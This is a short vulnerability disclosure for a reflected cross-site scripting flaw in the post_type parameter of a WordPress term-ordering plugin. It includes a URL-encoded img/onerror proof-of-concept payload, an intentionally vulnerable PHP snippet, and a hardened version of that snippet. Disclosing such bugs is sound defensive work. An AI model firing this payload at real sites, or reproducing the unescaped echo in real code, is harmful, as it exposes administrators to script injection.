Subject: Cross-Site Scripting (XSS) in Category Order and Taxonomy Terms Order 1.4.4
Date: Tue, 18 Aug 2015 22:49:04 +0200

Hello,

Plugin: Category Order and Taxonomy Terms Order 1.4.4 https://wordpress.org/plugins/taxonomy-terms-order/

1. Cross-Site Scripting (XSS)

Authenticated administrators can inject HTML/JS code (there is no CSRF protection).

Method: GET
Url: http://localhost/wp-admin/edit.php?page=to-interface-post&post_type=[xss]
Vulnerable parameters: post_type

Example PHP callstack:
TOPluginInterface   [/taxonomy-terms-order/include/interface.php:71]

Verification:
http://localhost/wp-admin/edit.php?page=to-interface-post&post_type=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E
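As an added illustration (constructed, not the plugin's actual interface.php code), the pattern behind this finding is an admin page that reflects the post_type query parameter into an attribute without escaping; the hardened form shows the validation, output escaping and nonce check a maintainer would add. Function names are hypothetical; the WordPress API calls are real.

```php
<?php
// Constructed illustration of the reported pattern; not code from the
// taxonomy-terms-order plugin. Assumes it runs inside WordPress.

// VULNERABLE (constructed): the raw GET value is written into an attribute.
function tto_render_interface_vulnerable() {
    $post_type = isset($_GET['post_type']) ? $_GET['post_type'] : 'post';
    // A value that closes the attribute and opens a tag becomes markup in
    // the admin's browser: this is the reflected XSS the advisory reports.
    echo '<input type="hidden" name="post_type" value="' . $post_type . '" />';
}

// HARDENED (constructed): validate the value, escape on output, add a nonce.
function tto_render_interface_hardened() {
    // 1. Normalise and only accept a registered post type; fall back otherwise.
    $post_type = isset($_GET['post_type']) ? sanitize_key($_GET['post_type']) : 'post';
    if (!post_type_exists($post_type)) {
        $post_type = 'post';
    }
    // 2. Escape at the output point even though the value was validated.
    echo '<form method="post">';
    echo '<input type="hidden" name="post_type" value="' . esc_attr($post_type) . '" />';
    // 3. Tie the form to a nonce so a crafted link cannot submit it.
    wp_nonce_field('tto_save_order', 'tto_nonce');
    echo '</form>';
}

// Handler for the form above: verify the nonce and the capability before
// changing anything (the advisory notes the page has no CSRF protection).
function tto_handle_save() {
    check_admin_referer('tto_save_order', 'tto_nonce');
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient privileges');
    }
    // ... persist the term order here
}
```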

--
Regards,
Marcin Probola